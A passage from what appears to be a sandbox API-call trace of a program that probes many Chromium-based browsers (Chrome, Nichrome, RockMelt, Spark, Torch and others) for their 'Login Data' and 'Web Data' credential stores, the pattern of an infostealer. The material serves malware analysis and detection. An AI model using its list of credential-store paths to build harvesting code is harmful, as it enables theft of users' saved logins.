(pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 0 [0167.769] GetProcessHeap () returned 0x840000 [0167.769] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0167.769] GetProcessHeap () returned 0x840000 [0167.769] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0167.770] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.771] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 67 [0167.771] GetProcessHeap () returned 0x840000 [0167.771] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8a) returned 0x874b40 [0167.772] GetProcessHeap () returned 0x840000 [0167.772] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.773] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 0 [0167.773] GetProcessHeap () returned 0x840000 [0167.773] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0167.773] GetProcessHeap () returned 0x840000 [0167.773] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0167.774] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.775] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 73 [0167.775] GetProcessHeap () returned 0x840000 [0167.775] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x96) returned 0x874b58 [0167.775] GetProcessHeap () returned 0x840000 [0167.775] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.776] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 0 [0167.777] GetProcessHeap () returned 0x840000 [0167.777] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0167.777] GetProcessHeap () returned 0x840000 [0167.777] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0167.778] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.778] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 71 [0167.778] GetProcessHeap () returned 0x840000 [0167.779] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x92) returned 0x874b50 [0167.779] GetProcessHeap () returned 0x840000 [0167.779] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.780] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 0 [0167.780] GetProcessHeap () returned 0x840000 [0167.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0167.780] GetProcessHeap () returned 0x840000 [0167.780] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0167.781] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.782] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 54 [0167.782] GetProcessHeap () returned 0x840000 [0167.782] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x70) returned 0x874b30 [0167.782] GetProcessHeap () returned 0x840000 [0167.782] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.783] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 0 [0167.784] GetProcessHeap () returned 0x840000 [0167.784] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0167.784] GetProcessHeap () returned 0x840000 [0167.784] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0167.784] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.785] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 62 [0167.785] GetProcessHeap () returned 0x840000 [0167.785] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x80) returned 0x874b40 [0167.785] GetProcessHeap () returned 0x840000 [0167.785] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.786] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 0 [0167.787] GetProcessHeap () returned 0x840000 [0167.787] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0167.787] GetProcessHeap () returned 0x840000 [0167.787] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0167.788] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.788] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 73 [0167.788] GetProcessHeap () returned 0x840000 [0167.788] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x96) returned 0x874b58 [0167.789] GetProcessHeap () returned 0x840000 [0167.789] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.790] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 0 [0167.790] GetProcessHeap () returned 0x840000 [0167.790] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0167.790] GetProcessHeap () returned 0x840000 [0167.790] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0167.791] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.792] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 71 [0167.792] GetProcessHeap () returned 0x840000 [0167.792] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x92) returned 0x874b50 [0167.792] GetProcessHeap () returned 0x840000 [0167.792] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.793] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 0 [0167.794] GetProcessHeap () returned 0x840000 [0167.794] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0167.794] GetProcessHeap () returned 0x840000 [0167.794] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0167.794] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.795] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 54 [0167.795] GetProcessHeap () returned 0x840000 [0167.795] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x70) returned 0x874b30 [0167.795] GetProcessHeap () returned 0x840000 [0167.795] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.797] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 0 [0167.797] GetProcessHeap () returned 0x840000 [0167.797] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0167.797] GetProcessHeap () returned 0x840000 [0167.797] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0167.798] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.812] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 62 [0167.812] GetProcessHeap () returned 0x840000 [0167.812] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x80) returned 0x874b40 [0167.812] GetProcessHeap () returned 0x840000 [0167.812] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.813] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 0 [0167.814] GetProcessHeap () returned 0x840000 [0167.814] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0167.814] GetProcessHeap () returned 0x840000 [0167.814] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0167.815] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.816] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 70 [0167.816] GetProcessHeap () returned 0x840000 [0167.816] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x90) returned 0x874b58 [0167.816] GetProcessHeap () returned 0x840000 [0167.816] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.817] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 0 [0167.817] GetProcessHeap () returned 0x840000 [0167.818] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0167.818] GetProcessHeap () returned 0x840000 [0167.818] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0167.819] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.820] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 68 [0167.820] GetProcessHeap () returned 0x840000 [0167.820] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8c) returned 0x874b50 [0167.820] GetProcessHeap () returned 0x840000 [0167.820] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.821] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 0 [0167.822] GetProcessHeap () returned 0x840000 [0167.822] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0167.822] GetProcessHeap () returned 0x840000 [0167.822] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0167.823] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.824] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 51 [0167.824] GetProcessHeap () returned 0x840000 [0167.824] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6a) returned 0x874b30 [0167.824] GetProcessHeap () returned 0x840000 [0167.824] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.825] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 0 [0167.826] GetProcessHeap () returned 0x840000 [0167.826] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0167.826] GetProcessHeap () returned 0x840000 [0167.826] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0167.827] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.827] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 59 [0167.827] GetProcessHeap () returned 0x840000 [0167.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7a) returned 0x874b40 [0167.828] GetProcessHeap () returned 0x840000 [0167.828] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0167.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0167.829] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 0 [0167.829] GetProcessHeap () returned 0x840000 [0167.829] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0167.830] GetProcessHeap () returned 0x840000 [0167.830] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0167.830] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0167.831] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 73 [0167.831] GetProcessHeap () returned 0x840000 [0167.831] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x96) returned 0x874b58 [0167.831] GetProcessHeap () returned 0x840000 [0167.831] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0168.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0168.924] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 0 [0170.973] GetProcessHeap () returned 0x840000 [0170.973] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0170.973] GetProcessHeap () returned 0x840000 [0170.973] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0170.974] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0170.975] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 71 [0170.975] GetProcessHeap () returned 0x840000 [0170.975] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x92) returned 0x874b50 [0170.975] GetProcessHeap () returned 0x840000 [0170.975] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0170.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0170.976] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 0 [0170.978] GetProcessHeap () returned 0x840000 [0170.978] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0170.978] GetProcessHeap () returned 0x840000 [0170.978] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0170.979] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0170.980] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 54 [0170.980] GetProcessHeap () returned 0x840000 [0170.980] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x70) returned 0x874b30 [0170.980] GetProcessHeap () returned 0x840000 [0170.980] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0170.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0170.981] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 0 [0170.981] GetProcessHeap () returned 0x840000 [0170.981] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0170.982] GetProcessHeap () returned 0x840000 [0170.982] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0170.982] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0170.988] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 62 [0170.988] GetProcessHeap () returned 0x840000 [0170.988] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x80) returned 0x874b40 [0171.010] GetProcessHeap () returned 0x840000 [0171.010] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.013] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 0 [0171.013] GetProcessHeap () returned 0x840000 [0171.013] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0171.095] GetProcessHeap () returned 0x840000 [0171.095] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0171.096] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.097] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 78 [0171.097] GetProcessHeap () returned 0x840000 [0171.097] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa0) returned 0x862b48 [0171.097] GetProcessHeap () returned 0x840000 [0171.097] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.098] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 0 [0171.099] GetProcessHeap () returned 0x840000 [0171.099] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x862b48 | out: hHeap=0x840000) returned 1 [0171.099] GetProcessHeap () returned 0x840000 [0171.099] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0171.099] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.135] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 76 [0171.135] GetProcessHeap () returned 0x840000 [0171.135] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x9c) returned 0x862c98 [0171.135] GetProcessHeap () returned 0x840000 [0171.135] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.136] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 0 [0171.136] GetProcessHeap () returned 0x840000 [0171.136] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x862c98 | out: hHeap=0x840000) returned 1 [0171.136] GetProcessHeap () returned 0x840000 [0171.136] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0171.137] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.138] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 59 [0171.138] GetProcessHeap () returned 0x840000 [0171.138] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7a) returned 0x874b30 [0171.138] GetProcessHeap () returned 0x840000 [0171.138] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.139] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 0 [0171.139] GetProcessHeap () returned 0x840000 [0171.139] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0171.139] GetProcessHeap () returned 0x840000 [0171.139] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0171.158] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.159] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 67 [0171.159] GetProcessHeap () returned 0x840000 [0171.159] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8a) returned 0x874b40 [0171.159] GetProcessHeap () returned 0x840000 [0171.159] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.160] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 0 [0171.161] GetProcessHeap () returned 0x840000 [0171.161] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0171.161] GetProcessHeap () returned 0x840000 [0171.161] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0171.161] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.162] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 70 [0171.162] GetProcessHeap () returned 0x840000 [0171.162] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x90) returned 0x874b58 [0171.162] GetProcessHeap () returned 0x840000 [0171.162] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.163] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 0 [0171.164] GetProcessHeap () returned 0x840000 [0171.164] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0171.164] GetProcessHeap () returned 0x840000 [0171.164] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0171.170] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.171] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 68 [0171.171] GetProcessHeap () returned 0x840000 [0171.171] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8c) returned 0x874b50 [0171.171] GetProcessHeap () returned 0x840000 [0171.171] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.172] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 0 [0171.172] GetProcessHeap () returned 0x840000 [0171.172] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0171.172] GetProcessHeap () returned 0x840000 [0171.172] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0171.200] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.201] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 51 [0171.201] GetProcessHeap () returned 0x840000 [0171.202] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6a) returned 0x874b30 [0171.202] GetProcessHeap () returned 0x840000 [0171.202] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.203] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 0 [0171.203] GetProcessHeap () returned 0x840000 [0171.203] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0171.203] GetProcessHeap () returned 0x840000 [0171.203] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0171.204] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.205] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 59 [0171.205] GetProcessHeap () returned 0x840000 [0171.205] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7a) returned 0x874b40 [0171.205] GetProcessHeap () returned 0x840000 [0171.205] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.206] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 0 [0171.207] GetProcessHeap () returned 0x840000 [0171.207] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0171.207] GetProcessHeap () returned 0x840000 [0171.207] 